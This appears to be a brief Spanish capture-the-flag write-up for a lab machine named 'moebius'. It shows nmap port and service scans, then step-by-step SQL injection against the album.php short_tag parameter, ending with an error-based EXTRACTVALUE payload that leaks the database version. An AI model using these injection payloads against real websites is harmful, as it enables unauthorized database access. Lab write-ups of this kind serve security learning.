moebius

# Nmap 7.95 scan initiated Mon May 26 12:15:17 2025 as: /usr/lib/nmap/nmap --privileged -p- -n -Pn -sS --min-rate 5000 -oG ports 10.10.41.175
Host: 10.10.41.175 ()	Status: Up
Host: 10.10.41.175 ()	Ports: 22/open/tcp//ssh///, 80/open/tcp//http///	Ignored State: closed (65533)
# Nmap done at Mon May 26 12:15:32 2025 -- 1 IP address (1 host up) scanned in 15.05 seconds

# Nmap 7.95 scan initiated Mon May 26 12:19:18 2025 as: /usr/lib/nmap/nmap --privileged -sVC -p22,80 -oG services 10.10.41.175
Host: 10.10.41.175 ()	Status: Up
Host: 10.10.41.175 ()	Ports: 22/open/tcp//ssh//OpenSSH 8.9p1 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.62 ((Debian))/
# Nmap done at Mon May 26 12:19:31 2025 -- 1 IP address (1 host up) scanned in 12.56 seconds

deteccion de qr

solamete es un video de troleo


Encontramos uan url a modificar http://moebius.thm/album.php?short_tag=smart al modificarlo nos encomtramos con lo siguiente

cuando probamos esta combinacion logramos eliminar el error y que es vulnerable al sql inyeccion http://moebius.thm/album.php?short_tag=fav'%23

Despues definimos el tema de cuantas columna tiene esta base de datos y al aparece solamente es uno http://moebius.thm/album.php?short_tag=fav' ORDER BY 2%23

Luegos nos toca extrear informacion pero al probar esto fracasamos http://moebius.thm/album.php?short_tag=fav'%20UNION%20SELECT%20version()%23 Para que funcione tenemos que aplicar de esta manera http://moebius.thm/album.php?short_tag=fav'%20AND%20(SELECT%20EXTRACTVALUE(1,CONCAT(0x3a,(SELECT%20version()))))%23

Última actualización